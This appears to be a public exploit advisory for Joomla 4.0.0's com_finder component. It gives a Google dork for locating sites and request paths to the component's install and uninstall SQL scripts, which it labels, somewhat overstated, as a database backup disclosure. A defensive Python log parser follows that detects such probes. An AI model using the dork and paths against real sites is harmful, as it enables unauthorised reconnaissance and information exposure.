#################################################################################################
# Exploit Title : Joomla Com_Finder Components 4.0.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 02/12/2018
# Vendor Homepage : joomla.org
# Software Download Links :
# github.com/joomla/40-backend-template/tree/master/administrator/components/com_finder/sql
# github.com/joomla/joomla-cms/archive/4.0.0-alpha1.zip
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 4.0
# Google Dorks : inurl:''/administrator/components/com_finder/''
# CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110189
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2259
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31521
# Vulnerability Type :
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CWE-23 - [ Relative Path Traversal ]
# CWE-200 - [ Information Exposure ]
# CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path : /administrator
# Exploit :
# /administrator/components/com_finder/sql/install.mysql.sql
# /administrator/components/com_finder/sql/install.postgresql.sql
# /administrator/components/com_finder/sql/uninstall.mysql.sql
# /administrator/components/com_finder/sql/uninstall.postgresql.sql
#################################################################################################
# Example Vulnerable Sites =>
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
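From the defender's side, the files listed under "Exploit" are served as plain static content, so the web server access log is the first place exposure shows up. The following is an added example, not part of the original advisory: it parses combined-format access log lines, flags requests for .sql scripts under administrator/components/*/sql/ at any install depth, and separates requests the server actually answered with 200 (file disclosed) from blocked or missing probes; the log lines are constructed samples using documentation IP ranges.

```python
import re
from collections import Counter
# Combined log format: client IP, timestamp, request line, status, size (rest ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) (?P<size>\S+)'
)
# Any .sql script under a component's sql/ directory, at any install depth (e.g. /joomla/).
SQL_PATH_RE = re.compile(
    r'/administrator/components/com_[a-z0-9_]+/sql/[^/?#]+\.sql(?:[?#]|$)', re.IGNORECASE
)

def parse_line(line):
    """Parse one access-log line into a dict, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def find_sql_disclosure(lines):
    """Events for requests targeting component install/uninstall SQL scripts.
    'served' is True on HTTP 200 (file disclosed); a 403/404 is still a probe worth noting."""
    events = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not SQL_PATH_RE.search(rec["path"]):
            continue
        events.append({"ip": rec["ip"], "path": rec["path"],
                       "status": rec["status"], "served": rec["status"] == 200})
    return events

def summarize(events):
    """Per source IP: number of probes and how many .sql files were actually served."""
    probes = Counter(e["ip"] for e in events)
    served = Counter(e["ip"] for e in events if e["served"])
    return {ip: {"probes": probes[ip], "served": served.get(ip, 0)} for ip in probes}

# Constructed sample log lines (documentation IP ranges, not from any real site).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Dec/2018:10:01:02 +0000] "GET /administrator/components/com_finder/sql/install.mysql.sql HTTP/1.1" 200 18342 "-" "curl/7.61.0"
203.0.113.7 - - [02/Dec/2018:10:01:03 +0000] "GET /administrator/components/com_finder/sql/uninstall.mysql.sql HTTP/1.1" 200 412 "-" "curl/7.61.0"
198.51.100.9 - - [02/Dec/2018:10:05:10 +0000] "GET /joomla/administrator/components/com_finder/sql/install.postgresql.sql HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.0.2.44 - - [02/Dec/2018:10:06:00 +0000] "GET /index.php?option=com_finder&view=search HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
""".splitlines()
if __name__ == "__main__":
    for ip, s in summarize(find_sql_disclosure(SAMPLE_LOG)).items():
        print(f"{ip}: {s['probes']} probe(s), {s['served']} file(s) served")
```

A 200 for any of these paths means the server is handing out the component's SQL scripts to unauthenticated clients and the directory should be denied at the web server, not just noted in the log.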